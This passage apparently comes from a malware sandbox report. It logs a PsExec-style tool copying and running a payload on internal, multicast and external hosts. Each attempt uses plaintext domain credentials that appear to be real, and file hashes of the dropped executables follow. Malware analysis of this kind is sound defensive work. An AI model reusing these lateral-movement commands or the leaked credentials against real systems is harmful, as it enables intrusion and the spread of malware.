            C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3508
          • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
            C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2948
          • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
            C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
            2⤵
              PID:3276
            • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
              C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
              2⤵
                PID:1804
              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:700
              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2020
              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                2⤵
                  PID:2956
                • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                  C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2404
                • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                  C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3932
                • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                  C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3756
                • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                  C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                  2⤵
                    PID:5108
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3520
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4916
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1936
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4164
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:792
                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                    C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                    2⤵
                      PID:4408
                    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2984
                    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2140
                    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3316
                    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                      2⤵
                        PID:1296
                      • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                        C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2476
                      • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                        C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                        2⤵
                          PID:1268
                        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1804
                        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1424
                        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                          2⤵
                            PID:1264
                          • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                            C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                            2⤵
                              PID:1440
                            • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                              C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                              2⤵
                                PID:760
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4900
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4440
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2364
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\49.12.169.208 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2368
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2148
                              • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\static.208.169.12.49.clients.your-server.de -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                2⤵
                                  PID:4292
                                • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
                                  C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
                                  2⤵
                                    PID:1916
                                • C:\Windows\system32\vssvc.exe
                                  C:\Windows\system32\vssvc.exe
                                  1⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2100
                                • C:\Windows\system32\wbengine.exe
                                  "C:\Windows\system32\wbengine.exe"
                                  1⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2700
                                • C:\Windows\System32\vdsldr.exe
                                  C:\Windows\System32\vdsldr.exe -Embedding
                                  1⤵
                                    PID:1500
                                  • C:\Windows\System32\vds.exe
                                    C:\Windows\System32\vds.exe
                                    1⤵
                                    • Checks SCSI registry key(s)
                                    PID:1384

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Temp\_vqv.exe

                                    Filesize

                                    331KB

                                    MD5

                                    27304b246c7d5b4e149124d5f93c5b01

                                    SHA1

                                    e50d9e3bd91908e13a26b3e23edeaf577fb3a095

                                    SHA256

                                    3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

                                    SHA512

                                    bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

                                  • C:\Users\Admin\AppData\Local\Temp\_yjy.exe

                                    Filesize

                                    36KB

                                    MD5

                                    3c0d740347b0362331c882c2dee96dbf

                                    SHA1

                                    8350e06f52e5c660bb416b03edb6a5ddc50c3a59

                                    SHA256

                                    ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

                                    SHA512

                                    a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

                                  • C:\Users\Admin\AppData\Local\Temp\fxugs.exe

                                    Filesize

                                    277KB

                                    MD5

                                    86d1a184850859a6a4d1c35982f3c40e

                                    SHA1

                                    4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5

                                    SHA256

                                    eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f

                                    SHA512

                                    e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

                                  • C:\Users\Admin\AppData\Local\Temp\zhkyc.exe

                                    Filesize

                                    751KB

                                    MD5

                                    68970b2cd5430c812bef5b87c1add6ea

                                    SHA1

                                    7695d829965b802c50d96a19dbc2fc361169624d

                                    SHA256

                                    e4e1e3c44e01c60fd433c6283bd8cd15a9941e1cbaad72e6409cc92e2e91263e

                                    SHA512

                                    1ea13dfb60cdca0338bb20a50419901a12387db2253c5d6ae3b6939c803e6f1e7998b7ba443c7472a931e64df94521cb6c6c3f646b01d5e671acb103d0a64475

                                  • memory/1012-4-0x0000000010000000-0x00000000100AA000-memory.dmp

                                    Filesize

                                    680KB

                                  • memory/1020-17-0x0000000180000000-0x000000018002B000-memory.dmp

                                    Filesize

                                    172KB